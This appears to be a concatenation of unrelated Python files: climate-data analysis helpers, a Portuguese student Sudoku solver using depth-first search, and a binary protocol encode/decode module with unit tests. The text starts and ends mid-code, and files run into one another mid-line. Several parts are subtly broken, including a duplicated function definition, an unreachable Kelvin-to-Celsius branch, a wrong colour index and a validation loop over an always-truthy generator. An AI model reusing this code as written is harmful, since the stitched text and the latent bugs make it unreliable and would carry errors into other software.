dt.date(fd.year,fd.month,monthrange(fd.year,fd.month)[1])+dt.timedelta(15) dates_list .append(fd) dates_array = np.array(dates_list) return dates_array def index_and_dates_slicing(dates_array,start_date,end_date): """This function will generate two np arrays 1. the indices of the selected dates relative to the original input array 2. the dates array from start_date to end the end date ----- Inputs: ------- 1. dates_array > numpy array with dates format datetime.date(YEAR,MO,DY) 2. start_date > datetime.date(YEAR,MO,DY) 3. end_date > datetime.date(YEAR,MO,DY) Both start and end date are inclusive""" import datetime as dt import numpy as np idx_dates_list=[] for i, j in enumerate(dates_array): idx_dates_list .append((i,j)) idx_dates_array = np.array(idx_dates_list) idx_array = idx_dates_array[(idx_dates_array[:,1]>=start_date) & (idx_dates_array[:,1]<=end_date)][:,0] dates_array = idx_dates_array[(idx_dates_array[:,1]>=start_date) & (idx_dates_array[:,1]<=end_date)][:,1] return idx_array,dates_array def geo_idx(dd, dd_array): """ Search for nearest decimal degree in an array of decimal degrees and return the index. np.argmin returns the indices of minium value along an axis. so subtract dd from all values in dd_array, take absolute value and find index of minium. Inputs: ______ dd : the value whose index you want to find (lat : 30N = -30.) dd_array: the list of values for your search (lats: -90 ... 90) Outputs: _______ geo_idx : The index of the value closest to the one present in the pool of values """ import numpy as np geo_idx = (np.abs(dd_array - dd)).argmin() return geo_idx def mpi_local_and_global_index(begin_idx, local_n): """ This function will return a list of tuples with a local index and the global index of the given value of begin index and local chunk size for mpi. The reason why we need this is because the we can run a for loop with two indicies if they are provided in a tuple form.\n Input: ------------ begin_index : of the lat/lon running on the local processor when using mpi local_n : the chunk size of the array we want to run on that processor Output: ----------- result : a list of tuple (local_idx,global_idx) """ local_idx= 0 result = [] for i in range(local_n): result.append((local_idx,begin_idx)) begin_idx += 1 local_idx += 1 return result def ts_lagged(ts,lag = 0, maxlag=3): """This function will shift the timeseries or 1d array based on the lag and maxlags in the analysis. The main reason is that if you want to make code general to accept lags as input, its important that the structure/size of the ts are same. Note: lag should not be more than the maxlag""" import numpy as np ts = np.array(ts) if lag < maxlag: return ts[maxlag-lag:(None if lag==0 else -lag)] elif lag == maxlag : return ts[:-lag] else: return "lag <= maxlag" def percentile_colorbar(input_array,in_percentile=99,other=True): """This function will take a list/nd array as first input agrument, the second input argument is the percentile of the value interested in (default = 99). The function will mask all the nans and find the percentile only on the non_nans. The output will give you the largest nth percentile and smallest nth""" import numpy as np input_array = np.ma.masked_invalid((np.array(input_array)).flatten()) non_nans_l = input_array[~np.isnan(input_array)] if in_percentile < 1: in_percentile = in_percentile*100 max_value = np.percentile(non_nans_l,in_percentile) if other == False: return max_value else: min_value = np.percentile(non_nans_l,100-in_percentile) return max_value,min_value def adjaceny_matrix(struct_id): if struct_id == 0: #small extext short duration #struct_cat = structs[struct_id] struct_mat = np.zeros((3,3,3),dtype=int) struct_mat[1,1,1] = 1 elif struct_id == 1: #small extext long duration #struct_cat = structs[struct_id] struct_mat = np.zeros((3,3,3),dtype=int) struct_mat[:,1,1] = 1 elif struct_id == 2: #large extext short duration # struct_cat = structs[struct_id] struct_mat = np.zeros((3,3,3),dtype=int) struct_mat[1,:,:] = 1 elif struct_id == 3: #large extext long duration or 26 neighbours # struct_cat = structs[struct_id] struct_mat = np.ones((3,3,3),dtype=int) elif struct_id == 4: #18 neighbours struct_mat = np.zeros((3,3,3),dtype = int) struct_mat[1,:,:] = np.ones((3,3),dtype = int) struct_mat[0,:,1] = int(1) struct_mat[2,:,1] = int(1) struct_mat[0,1,:] = int(1) struct_mat[2,1,:] = int(1) else: # 6 neighbors struct_mat = np.zeros((3,3,3),dtype = int) struct_mat[1,:,1] = int(1) struct_mat[1,1,:] = int(1) struct_mat[0,1,1] = int(1) struct_mat[2,1,1] = int(1) """ Standard types: https://www.mathworks.com/help/images/ref/bwconncomp.html http://what-when-how.com/computer-graphics-and-geometric-modeling/raster-algorithms-basic-computer-graphics-part-1/ """ return struct_mat #Create a Matrix of subsequent whole numbers of the same shape as the global grid def create_seq_mat(nlat =192, nlon = 288): """ This function will create a 2d matrix from 0 to nlat*nlon rows = nlat cols = nlon """ import numpy as np mat = np.zeros((nlat,nlon)) for i in range(nlat): mat[i,:] = np.arange(i*nlon, (i+1)*nlon) return np.asarray(mat, dtype =int) def cumsum_lagged (ar,lag=1): """ This code will cumsum the given array and the previous lagged values and return one array of the same length as input ar Inputs: _______ ar : 1-d array lag: num of lagged values you want to cumsum Output: ______ cumsumed array 1d same length as ar """ import numpy as np if lag == 0: cum_ar = ar else: cum_ar = np.ma.masked_all((ar.size,lag+1)) cum_ar[:,0] = ar for l in range(lag): cum_ar[l+1:,l+1] = ar[:-(l+1)] return cum_ar.sum(axis=1) def cumsum_lagged (ar,lag=1, ignore_t0 = False): """ This code will cumsum the given array and the previous lagged values and return one array of the same length as input ar (mainly to check the affect of drivers on gpp) Inputs: _______ ar : 1-d array lag: num of lagged values you want to cumsum ignore_t0 : True/False since the current climate conditions (esp. for PME) where anti correlated with neg gpp ext for lag = 0 it was decided to check for the possible cases where we can ignore the current condition value for lag = 0 in cumlag effects Output: ______ cumsumed array 1d same length as ar """ import numpy as np ar = np.array(ar) if (lag == 0 and ignore_t0 == False): cum_ar = ar return cum_ar elif (lag>0 and ignore_t0 == False): cum_ar = np.ma.masked_all((ar.size,lag+1)) cum_ar[:,0] = ar for l in range(lag): cum_ar[l+1:,l+1] = ar[:-(l+1)] return cum_ar.sum(axis=1) else: if lag ==1: cum_ar = np.ma.masked_all((ar.size)) cum_ar [lag:] = ar[:-lag] return cum_ar else: cum_ar = np.ma.masked_all((ar.size,lag)) cum_ar[1:,0] = ar[:-1] for l in range(1,lag): cum_ar[l+1:,l] = ar[:-(l+1)] return cum_ar.sum(axis=1) def cum_av_lagged (ar,lag=1, ignore_t0 = True): """ This code will cumsum and then mean/average the given array and the previous lagged values and return one array of the same length as input ar Inputs: ------- ar : 1-d array lag: num of lagged values you want to cum_mean (cum_sum and then average) ignore_t0 : True/False since the current climate conditions (esp. for PME) where anti correlated with neg gpp ext for lag = 0 it was decided to check for the possible cases where we can ignore the current condition value for lag = 0 in cumlag effects Output: ------- cumsumed array 1d same length as ar """ import numpy as np ar = np.array(ar) if (lag == 0 and ignore_t0 == False): cum_ar = ar result = cum_ar elif (lag>0 and ignore_t0 == False): cum_ar = np.ma.masked_all((ar.size,lag+1)) cum_ar[:,0] = ar for l in range(lag): cum_ar[l+1:,l+1] = ar[:-(l+1)] result = cum_ar.sum(axis=1) else: if lag ==1: cum_ar = np.ma.masked_all((ar.size)) cum_ar [lag:] = ar[:-lag] result = cum_ar else: cum_ar = np.ma.masked_all((ar.size,lag)) cum_ar[1:,0] = ar[:-1] for l in range(1,lag): cum_ar[l+1:,l] = ar[:-(l+1)] result= cum_ar.sum(axis=1) if ignore_t0 == True: return result/lag else: return result/(lag+1) def label_count_locations(bin_ar, min_event_size = 3, lag= None): """ this function will us the ndimage package to find the linear continuous events and return is in the form of a dictionary also, it will return the the arguments of the begining point of these events this information can be used to find the triger of extreme events Inputs: ------- ar : 1-d array binary array of extremes min_event_size : the minimun size that will filter the extreme events and report the first args Outputs: ------- dict : Dictionary with label keys and subsequent counts and locations of extreme events ext_arg : The first argument of the extreme events in 'ar' """ from scipy import ndimage import numpy as np dic = {} larray,narray = ndimage.label(bin_ar,structure = np.ones(3)) locations = ndimage.find_objects(larray) for idx, l in enumerate (np.unique(larray, return_counts = True)[0]): if (l>0 and np.unique(larray, return_counts = True)[1][idx] >= min_event_size) : dic[l] = {} dic[l]['counts'] = np.unique(larray, return_counts = True)[1][idx] dic[l]['loc'] = locations[idx-1] args = np.arange(len(bin_ar)) ext_arg = [] for k in dic.keys(): ext_arg.append(args[dic[k]['loc'][0]][0]) ext_arg = np.array(ext_arg) ext_arg = ext_arg[ext_arg>=lag] return dic, ext_arg def patch_with_gaps(bin_ar, max_gap =3, lag = None): """ this function will use the ndimage package to find the linear continuous events and return it in the form of a dictionary also, it will return the the arguments of the begining point of these events this information can be used to find the triger of extreme events This function will make events continuous with gaps e.g. max_gaps = 2 > [1,1,0,0,0,1,1,0,0,1,1,0,1] with have 2 extremes Inputs: ------- ar : 1-d array binary array of extremes max_gape : the maximum gap size that will filter the extreme events and report the first args Outputs: ------- dict : Dictionary with label keys and subsequent counts and locations of extreme events ext_arg : The first argument of the extreme events in 'ar' """ from scipy import ndimage import numpy as np dic = {} larray,narray = ndimage.label(bin_ar,structure = np.ones(3)) locations = ndimage.find_objects(larray) for idx, l in enumerate (np.unique(larray, return_counts = True)[0]): if l>0: dic[l] = {} dic[l]['counts'] = np.unique(larray, return_counts = True)[1][idx] dic[l]['loc'] = locations[idx-1] args = np.arange(len(bin_ar)) start_args = [] for k in dic.keys(): start_args.append(args[dic[k]['loc'][0]][0]) end_args = [] for k in dic.keys(): end_args.append(args[dic[k]['loc'][0]][-1]) gaps = np.array(start_args[1:]) - np.array(end_args[:-1])-1 gaps_mask = ~(gaps <= max_gap) new_start_args = np.zeros((gaps_mask.sum() +1)) new_start_args[0] = start_args[0] new_start_args[1:] = np.array(start_args[1:])[gaps_mask] new_start_args = np.asarray(new_start_args, dtype = int) new_start_args = new_start_args [new_start_args>=lag] return dic, new_start_args def patch_with_gaps_and_eventsize(bin_ar, max_gap =2, min_cont_event_size =3, lag = None): """ this function will use the ndimage package to find the 1-D continuous events and return it in the form of a dictionary also, it will return the the arguments of the begining point of these events this information can be used to find the triger of extreme events This function will make events continuous with gaps e.g. max_gaps = 2 > [1,1,1,0,0,0,1,1,0,0,1,1,1,0,1] with have 2 extremes Inputs: ------- bin_ar : 1-d array binary array of extremes max_gap : the maximum gap size that will filter the extreme events and report the first args Outputs: ------- dict : Dictionary with label keys and subsequent counts and locations of extreme events ext_arg : The first argument of the extreme events in 'ar' """ from scipy import ndimage import numpy as np bin_ar = np.asarray(bin_ar, dtype = int) bin_ar_0s = np.zeros(bin_ar.shape) bin_ar_0s[lag:] = bin_ar[lag:] del bin_ar bin_ar = bin_ar_0s dic = {} larray,narray = ndimage.label(bin_ar,structure = np.ones(3)) # this command labels every continuous event uniquely and also return total number of continuous events locations = ndimage.find_objects(larray) # this command gives the location of the extremes for every label for idx, l in enumerate (np.unique(larray, return_counts = True)[0]): # returns the labels names starting with 1 and total cells with that label if l>0: dic[l] = {} dic[l]['counts'] = np.unique(larray, return_counts = True)[1][idx] # for every label saving the counts dic[l]['loc'] = locations[idx-1] # for every label saving the location args = np.arange(len(bin_ar)) # the arguments or index numbers of 'bin_ar' start_args = [] for k in dic.keys(): start_args.append(args[dic[k]['loc'][0]][0]) # list start args/idx (wrt bin_ar) of the events end_args = [] for k in dic.keys(): end_args.append(args[dic[k]['loc'][0]][-1]) # list of end args/idx (wrt bin_ar) of the events gaps = np.array(start_args[1:]) - np.array(end_args[:-1])-1 # ar: gaps/discontinuity(in months) between subsequent events gaps_mask = ~(gaps <= max_gap) # this is the mask of the gaps where the gaps are more than 'max_gap' i.e. gaps>max_gap are True ... # by doing so the events with a larger gap are separate and all other are continuous new_start_args = np.zeros((gaps_mask.sum() +1)) # total events will be one more than number of qualified continuoous event new_start_args[0] = start_args[0] # first arg will be the same as ori start_args new_start_args[1:] = np.array(start_args[1:])[gaps_mask] # all others will follow the new discrete first arg new_start_args = np.asarray(new_start_args, dtype = int) new_end_args = np.zeros((gaps_mask.sum() +1)) # the same goes for the end_args new_end_args[-1] = end_args[-1] new_end_args[:-1] = np.array(end_args[:-1])[gaps_mask] new_end_args = np.asarray(new_end_args, dtype = int) new_mask = new_start_args>=lag #incase the lags are considered you have to ingore the first few agrs = to the len of lag new_start_args = new_start_args [new_mask] #with lag new_end_args = new_end_args [new_mask] #with lag new_events = {} for idx in range(len(new_start_args)): new_events[idx] = bin_ar[new_start_args[idx]:new_end_args[idx]+1] # gives you the list of new events after checking for gaps more than max_gap only new_events = {} i=0 triggers = [] for idx in range(len(new_start_args)): bin_event = bin_ar[new_start_args[idx]:new_end_args[idx]+1] # checking on all qualified previous continuous events with gap larray,narray = ndimage.label(bin_event,structure = np.ones(3)) # generating the labels and the total arrays for the new selected continuous events with gap ev_size = np.unique(larray, return_counts = True)[1] # event size of the different extreme events without gaps within the selected continous events with gaps if (ev_size>= min_cont_event_size).sum() >=1: # looking for any events which is atleast 3-months continuous new_events[i] = bin_event i=i+1 triggers.append(new_start_args[idx]) triggers = np.asarray(triggers, dtype = int) #'new_events' are the qualified continuous events with gaps and at-least one 3 month continuous event #'triggers' are the first args of new events return new_events, triggers #to nomalize a timeseries in order to compare everything in a way they are meant to be! def norm(arr): if np.max(arr) == np.min(arr) : return np.array([0]*len(arr)) return np.array([(x-np.min(arr))/(np.max(arr)-np.min(arr)) for x in arr]) def Unit_Conversions(From ='kg m-2 s-1', To='mm day-1'): """ To assist with the unit conversion "From" to "To" units Returns: -------- the multiplication factor and the new units ("To") """ From = str (From) To = str (To) if From == To: unit_con_factor = 1 unit_con_name = To elif (From in ['kgm-2s-1', 'kg m-2 s-1']) and (To in ['mmday-1','mm day-1', 'mm/day']): unit_con_factor = 86400 unit_con_name = To elif (To in ['kgm-2s-1', 'kg m-2 s-1']) and (From in ['mmday-1','mm day-1', 'mm/day']): unit_con_factor = 86400**(-1) unit_con_name = To elif (From in ['kgm-2', 'kg m-2']) and (To in ['mm']): unit_con_factor = 1 unit_con_name = To elif (To in ['kgm-2', 'kg m-2']) and (From in ['mm']): unit_con_factor = 1 unit_con_name = To elif (From in ['K']) and (To in ['C']): unit_con_factor = -273.15 unit_con_name = To elif (To in ['C']) and (From in ['K']): unit_con_factor = 273.15 unit_con_name = To return unit_con_factor, unit_con_name # To make a new masked series when encounded with an error due to ma.core.MaskedConstant error def MaskedConstant_Resolve (ar): """ To make a new masked series when encounded with an error due to ma.core.MaskedConstant error Input: ------ ar: any array or list or series Returns: ------- a masked array with error replaced by np.nan and made invalid with masking """ from numpy.ma import masked values = [] for val in ar: if val is masked: val = np.nan values.append(val) return np.ma.masked_invalid(values) # To make a new masked series when encounded with an error due to numpy.ma.core.MaskedArray def MaskedArray_Resolve (ar): """ To make a new masked series when encounded with an error due to ma.core.MaskedConstant error Input: ------ ar: any array or list or series Returns: ------- a masked array with error replaced by np.nan and made invalid with masking """ values = [] for val in ar: try: val = float(val) except: val = np.nan values.append(val) return np.ma.masked_invalid(values) # Register RdGn colormap import colorsys as cs import matplotlib.pyplot as plt val = 0.8 Rd = cs.rgb_to_hsv(1,0,0) Rd = cs.hsv_to_rgb(Rd[0],Rd[1],val) Gn = cs.rgb_to_hsv(0,1,0) Gn = cs.hsv_to_rgb(Gn[0],Gn[0],val) RdGn = {'red' : ((0.0, 0.0, Rd[0]), (0.5, 1.0, 1.0 ), (1.0, Gn[0], 0.0 )), 'green': ((0.0, 0.0, Rd[1]), (0.5, 1.0, 1.0 ), (1.0, Gn[1], 0.0 )), 'blue' : ((0.0, 0.0, Rd[2]), (0.5, 1.0, 1.0 ), (1.0, Gn[2], 0.0 ))} plt.register_cmap(name = 'RdGn',data = RdGn) #|------------------------------------------------------# #|Trabalho de buscas - Inteligência artificial # #|Grupo: # #|<NAME> 628182 # #|<NAME> 628174 # #|<NAME> 628247 # #|------------------------------------------------------# #|Resolucao de um jogo Sudoku utilizando a busca em # #|profundidade (não informada) # #|------------------------------------------------------# # A ideia do algoritmo é que a cada iteração ele procura por um espaço vazio (representado por valores de 0) # Essa busca é sempre feita da esquerda para a direita e de cima para baixo no tabuleiro. # Após um valor ser encontrado, o algoritmo entra em um loop for que testa todos os 9 possíveis valores para # aquele espaço, sempre verificando se aquela jogada é possível. # # Caso o a jogada (combinação de valor e posição) seja possível, o algoritmo atribui o novo valor para a # posição e chama a função de resolver o sudoku recursivamente no novo tabuleiro. # Quando uma jogada não pode ser feita, o algoritmo tenta o próximo valor possível para aquela posição. # Caso nenhum valor seja possível, o algoritmo retorna falso para a função acima na recusão indicando que # o caminho escolhido não leva ao resultado final e este tenta outro valor. # Caso o valor Falso retorne, para todas as oções, até a primeira chamada da função que resolve o jogo, # o algoritmo final retorna falso indicando que não foi possível resolver o jogo. from os import system, name from time import sleep #DEBUG debug = False # Conta o número de iterações até ser resolvido o jogo numIter = 0 # Funcao de limpar tela def limpaTela(): # Windows if name == 'nt': _ = system('cls') # mac e linux else: _ = system('clear') # Função que recebe um tabuleior na forma de listas e printa na tela de um jeito mais fácil de ver def printaTabuleiro(tabuleiro): print("+" + "---+"*9) for i, row in enumerate(tabuleiro): print(("|" + " {} {} {} |"*3).format(*[x if x != 0 else " " for x in row])) if i % 3 == 2: print("+" + "---+"*9) else: print("+" + " +"*9) # Função que acha a próxima possição vazia do tabuleiro para realizar a próxima jogada def achaProxPosVazia(tabuleiro): for i in range(0,9): for j in range(0,9): if tabuleiro[i][j] == 0: return i,j return -1,-1 # Função que verifica se a jogada é possivel # Verifica 3 condições: ### Se não há o valor na linha ### Se não há o valor na coluna ### Se não há o valor na seção (quadrado) def valorLocalValido(tabuleiro, row, col, val): # Verifica se não há o valor da jogada na linha for j in range(9): if tabuleiro[row][j] == val: return False # Verifica se não há o valor da jogada na coluna for i in range(9): if tabuleiro[i][col] == val: return False # Verifica se não há o valor da jogada na seção secLinInicial = (row//3) * 3 secColInicial = (col//3) * 3 for i in range(secLinInicial, secLinInicial+3): for j in range(secColInicial, secColInicial+3): if tabuleiro[i][j] == val: return False # Se nao encontrou nenhum problema retorna verdadeiro return True # Função se resuloção do jogo que é chamada recursivamente # Recebe o tabuleiro e o tempo de espera para melhor visualização def resolverSudoku(tabuleiro, tempoEspera): #variavel global para o número de iterações global numIter #Mais uma iteração numIter = numIter + 1 limpaTela() printaTabuleiro(tabuleiro) # Espera 0.5 segundos para a próxima jogada para melhor visualização sleep(tempoEspera) row,col = achaProxPosVazia(tabuleiro) if row == -1 or col == -1: #nao ha mais valores 0, o jogo foi concluído return True #Testa todos os 9 possíveis valores começando em 0 for val in range(1,10): # verifica se a jogada é valida if(valorLocalValido(tabuleiro, row, col, val)): # Se a jogada é valida, atualiza o tabuleiro e resolve o novo jogo tabuleiro[row][col] = val if(resolverSudoku(tabuleiro, tempoEspera)): return True # Se um falso foi retornado desfaz a última jogada e tenta o proximo valor tabuleiro[row][col] = 0 # Se nenhum valor foi encontrado, retorna falso, indicando que não eh possivel resolver return False muitoFacil = [ [1, 0, 0, 5, 0, 9, 6, 7, 0], [4, 0, 2, 8, 7, 0, 0, 1, 9], [9, 6, 7, 1, 4, 3, 2, 8, 5], [2, 0, 4, 9, 0, 0, 0, 0, 0], [5, 0, 6, 0, 0, 0, 0, 0, 8], [0, 0, 0, 0, 1, 0, 4, 2, 0], [0, 0, 0, 3, 6, 2, 7, 4, 0], [6, 4, 0, 0, 0, 1, 0, 5, 0], [0, 2, 1, 4, 0, 8, 9, 3, 6], ] facil = [ [1, 2, 9, 0, 6, 0, 0, 0, 3], [0, 0, 0, 0, 0, 0, 0, 0, 9], [0, 0, 0, 3, 5, 0, 0, 0, 8], [0, 0, 0, 8, 0, 3, 9, 0, 0], [3, 0, 1, 0, 0, 0, 5, 0, 2], [0, 0, 6, 1, 0, 5, 0, 0, 0], [4, 0, 0, 0, 7, 6, 0, 0, 0], [2, 0, 0, 0, 0, 0, 0, 0, 0], [9, 0, 0, 0, 8, 0, 1, 3, 4], ] medio = [ [6, 0, 1, 0, 0, 0, 5, 0, 8], [0, 0, 0, 0, 8, 0, 0, 0, 0], [0, 0, 0, 5, 0, 2, 0, 0, 0], [2, 0, 8, 1, 0, 4, 6, 0, 3], [1, 0, 0, 3, 0, 7, 0, 0, 4], [0, 0, 3, 0, 0, 0, 7, 0, 0], [7, 6, 0, 0, 0, 0, 0, 1, 2], [0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 2, 0, 6, 0, 8, 0, 4, 0], ] dificil = [ [0, 0, 7, 5, 0, 1, 9, 0, 0], [0, 0, 8, 0, 6, 0, 4, 0, 0], [0, 5, 0, 8, 0, 4, 0, 7, 0], [0, 0, 2, 0, 7, 0, 3, 0, 0], [4, 0, 0, 0, 8, 0, 0, 0, 9], [0, 3, 0, 0, 1, 0, 0, 6, 0], [1, 9, 0, 0, 0, 0, 0, 5, 4], [0, 7, 0, 0, 0, 0, 0, 3, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0], ] muitoDificil = [ [4, 0, 0, 0, 0, 0, 0, 0, 7], [2, 0, 0, 0, 1, 0, 0, 0, 4], [0, 1, 0, 0, 0, 0, 0, 5, 0], [5, 0, 1, 0, 4, 0, 7, 0, 6], [0, 3, 0, 1, 0, 8, 0, 4, 0], [0, 0, 0, 6, 0, 3, 0, 0, 0], [0, 0, 2, 0, 0, 0, 4, 0, 0], [7, 0, 0, 0, 8, 0, 0, 0, 9], [0, 5, 0, 0, 2, 0, 0, 7, 0], ] #VARIAVEIS DE DEBUG if (debug): sleepTime = 0.0 else: sleepTime = 0.5 meuSudoku = [] # Opcao do usuario opcao = 0 limpaTela() # Menu inicial print("**********SUDOKU IA**********") print("\n\nSelecione o tipo de jogo:") print("1 - Rodar exemplo Muito Fácil") print("2 - Rodar exemplo Fácil") print("3 - Rodar exemplo Médio") print("4 - Rodar exemplo Difícil") print("5 - Rodar exemplo Muito Difícil") print("6 - Inserir um Sudoku") #Le opção opcao = int(input()) #Trata cada opção if opcao == 1: print(resolverSudoku(muitoFacil, sleepTime), "\n", "Número de iterações: ", numIter) elif opcao == 2: print(resolverSudoku(facil, sleepTime), "\n", "Número de iterações: ", numIter) elif opcao == 3: print(resolverSudoku(medio, sleepTime), "\n", "Número de iterações: ", numIter) elif opcao == 4: print(resolverSudoku(dificil, sleepTime), "\n", "Número de iterações: ", numIter) elif opcao == 5: print(resolverSudoku(muitoDificil, sleepTime), "\n", "Número de iterações: ", numIter) elif opcao == 6: limpaTela() print("Digite seu Sudoku, os elementos devem ser números de 0 a 9, sendo 0 uma casa vazia\n") # Lê os inputs do usuários for i in range(0, 9): elementos = list(map(int, input().split())) #Condições do sudoku while(len(elementos) != 9): print("Cada fileira deve ter 9 elementos") elementos = list(map(int, input().split())) while(i > 9 or i < 0 for i in elementos): print("Os elementos devem ser de 0 a 9") elementos = list(map(int, input().split())) meuSudoku.append(elementos) print(resolverSudoku(meuSudoku, sleepTime), "\n", "Número de iterações: ", numIter)from __future__ import unicode_literals import struct import itertools try: from StringIO import StringIO except ImportError: from io import BytesIO as StringIO class Hello(object): """ Hello(version: String, cookie: String, program_name: String, instance_name: String) """ def __init__(self, version, cookie, program_name, instance_name): self.version = version self.cookie = cookie self.program_name = program_name self.instance_name = instance_name def __str__(self): return ("Hello(version={!r}, cookie={!r}, program_name={!r}, " "instance_name={!r})" .format(self.version, self.cookie, self.program_name, self.instance_name)) def __eq__(self, other): return (self.version == other.version and self.cookie == other.cookie and self.program_name == other.program_name and self.instance_name == other.instance_name) def encode(self): v, c, p, i = map(lambda x: x.encode(), (self.version, self.cookie, self.program_name, self.instance_name)) return struct.pack(">H{}sH{}sH{}sH{}s" .format(*map(len, (v, c, p, i))), len(v), v, len(c), c, len(p), p, len(i), i) @staticmethod def decode(bs): reader = StringIO(bs) version_length = struct.unpack(">H", reader.read(2))[0] version = reader.read(version_length).decode() cookie_length = struct.unpack(">H", reader.read(2))[0] cookie = reader.read(cookie_length).decode() program_name_length = struct.unpack(">H", reader.read(2))[0] program_name = reader.read(program_name_length).decode() instance_name_length = struct.unpack(">H", reader.read(2))[0] instance_name = reader.read(instance_name_length).decode() return Hello(version, cookie, program_name, instance_name) def test_hello(): version, cookie, program, instance = "a", "b", "c", "d" hello = Hello(version, cookie, program, instance) assert(hello.version == version) assert(hello.cookie == cookie) assert(hello.program_name == program) assert(hello.instance_name == instance) encoded = hello.encode() assert(len(encoded) == 12) decoded = Hello.decode(encoded) assert(decoded.version == version) assert(decoded.cookie == cookie) assert(decoded.program_name == program) assert(decoded.instance_name == instance) assert(hello == decoded) assert(str(hello) == str(decoded)) class Ok(object): """ Ok(initial_credits: U32, credit_list: Array[(stream_id: U64, stream_name: bytes, point_of_ref: U64)], source_list: Array[(source_name: String, source_address: String)]) """ def __init__(self, initial_credits, credit_list, source_list): self.initial_credits = initial_credits self.credit_list = credit_list self.source_list = source_list def __str__(self): return ("Ok(initial_credits={!r}, credit_list={!r}, source_list={!r})" .format(self.initial_credits, self.credit_list, self.source_list)) def __eq__(self, other): return (self.initial_credits == other.initial_credits and self.credit_list == other.credit_list and self.source_list == other.source_list) def encode(self): packed_credits = [] for (sid, sn, por) in self.credit_list: packed_credits.append( struct.pack('>QH{}sQ'.format(len(sn)), sid, len(sn), sn, por)) packed_sources = [] for source, addr in self.source_list: s = source.encode() a = addr.encode() packed_sources.append( struct.pack('>H{}sH{}s'.format(len(s), len(a)), len(s), s, len(a), a)) return (struct.pack('>II', self.initial_credits, len(self.credit_list)) + b''.join(packed_credits) + struct.pack('>I', len(packed_sources)) + b''.join(packed_sources)) @staticmethod def decode(bs): reader = StringIO(bs) initial_credit = struct.unpack(">I", reader.read(4))[0] credit_list_length = struct.unpack(">I", reader.read(4))[0] credit_list = [] for _ in range(credit_list_length): stream_id = struct.unpack(">Q", reader.read(8))[0] stream_name_length = struct.unpack(">H", reader.read(2))[0] stream_name = reader.read(stream_name_length) point_of_ref = struct.unpack(">Q", reader.read(8))[0] credit_list.append((stream_id, stream_name, point_of_ref)) source_list_length = struct.unpack('>I', reader.read(4))[0] source_list = [] for _ in range(source_list_length): source_length = struct.unpack('>H', reader.read(2))[0] source = reader.read(source_length).decode() addr_length = struct.unpack('>H', reader.read(2))[0] addr = reader.read(addr_length).decode() source_list.append((source, addr)) return Ok(initial_credit, credit_list, source_list) def test_ok(): ic, cl = 100, [(1, b"1", 0), (2, b"2", 1)] sl = [("source1", "127.0.0.1:7000"), ("source2", "192.168.0.1:5555")] ok = Ok(ic, cl, sl) assert(ok.initial_credits == ic) assert(ok.credit_list == cl) assert(ok.source_list == sl) encoded = ok.encode() assert(len(encoded) == (4 + 4 + len(cl)*(8 + 2 + 1 + 8) + 4 + sum((4 + sum(map(len, p)) for p in sl)))) decoded = Ok.decode(encoded) assert(isinstance(decoded, Ok)) assert(decoded.initial_credits == ic) assert(decoded.credit_list == cl) assert(decoded == ok) assert(str(decoded) == str(ok)) class Error(object): """ Error(msg: String) """ def __init__(self, msg): self.message = msg def __str__(self): return "Error(message={!r})".format(self.message) def __eq__(self, other): return self.message == other.message def encode(self): encoded = self.message.encode() return struct.pack(">H{}s".format(len(encoded)), len(encoded), encoded) @staticmethod def decode(bs): reader = StringIO(bs) msg_length = struct.unpack(">H", reader.read(2))[0] msg = reader.read(msg_length).decode() return Error(msg) def test_error(): msg = "hello world" error = Error(msg) assert(error.message == msg) encoded = error.encode() assert(len(encoded) == len(msg.encode()) + 2) decoded = Error.decode(encoded) assert(isinstance(decoded, Error)) assert(decoded.message == msg) assert(decoded == error) assert(str(decoded) == str(error)) class Notify(object): """ Notify(stream_id: U64, stream_name: bytes, point_of_ref: U64) """ def __init__(self, stream_id, stream_name, point_of_ref=0): self.stream_id = stream_id self.stream_name = stream_name self.point_of_ref = point_of_ref def __str__(self): return ("Notify(stream_id={!r}, stream_name={!r}, point_of_ref={!r})" .format(self.stream_id, self.stream_name, self.point_of_ref)) def __eq__(self, other): return (self.stream_id == other.stream_id and self.stream_name == other.stream_name and self.point_of_ref == other.point_of_ref) def encode(self): return struct.pack(">QH{}sQ".format(len(self.stream_name)), self.stream_id, len(self.stream_name), self.stream_name, self.point_of_ref) @staticmethod def decode(bs): reader = StringIO(bs) stream_id = struct.unpack(">Q", reader.read(8))[0] stream_name_length = struct.unpack(">H", reader.read(2))[0] stream_name = reader.read(stream_name_length) point_of_ref = struct.unpack(">Q", reader.read(8))[0] return Notify(stream_id, stream_name, point_of_ref) def test_notify(): sid, sn, por = 0, b"0", 1 notify = Notify(sid, sn, por) assert(notify.stream_id == sid) assert(notify.stream_name == sn) assert(notify.point_of_ref == por) encoded = notify.encode() assert(len(encoded) == 8 + 2 + 1 + 8) decoded = Notify.decode(encoded) assert(isinstance(decoded, Notify)) assert(decoded.stream_id == sid) assert(decoded.stream_name == sn) assert(decoded.point_of_ref == por) assert(decoded == notify) assert(str(decoded) == str(notify)) class NotifyAck(object): """ NotifyAck(notify_success: Bool, stream_id: U64, point_of_ref: U64) """ def __init__(self, notify_success, stream_id, point_of_ref): self.notify_success = notify_success self.stream_id = stream_id self.point_of_ref = point_of_ref def __str__(self): return ("NotifyAck(notify_success={!r}, stream_id={!r}, point_of_ref={!r})" .format(self.notify_success, self.stream_id, self.point_of_ref)) def __eq__(self, other): return (self.notify_success == other.notify_success and self.stream_id == other.stream_id and self.point_of_ref == other.point_of_ref) def encode(self): return struct.pack('>?QQ', self.notify_success, self.stream_id, self.point_of_ref) @staticmethod def decode(bs): reader = StringIO(bs) notify_success = struct.unpack(">?", reader.read(1))[0] stream_id = struct.unpack(">Q", reader.read(8))[0] point_of_ref = struct.unpack(">Q", reader.read(8))[0] return NotifyAck(notify_success, stream_id, point_of_ref) def test_notify_ack(): suc, sid, por = False, 0, 12 notify_ack = NotifyAck(suc, sid, por) assert(notify_ack.notify_success == suc) assert(notify_ack.stream_id == sid) assert(notify_ack.point_of_ref == por) encoded = notify_ack.encode() assert(len(encoded) == 1 + 8 + 8) decoded = NotifyAck.decode(encoded) assert(isinstance(decoded, NotifyAck)) assert(decoded.notify_success == suc) assert(decoded.stream_id == sid) assert(decoded.point_of_ref == por) assert(decoded == notify_ack) assert(str(decoded) == str(notify_ack)) class Message(object): """ Message(stream_id: int, flags: byte, message_id: (int | None), event_time: int, key: (bytes | None), message: (bytes | None)) """ Ephemeral = 1 Boundary = 2 Eos = 4 UnstableReference = 8 EventTime = 16 Key = 32 def __init__(self, stream_id, flags, message_id=None, 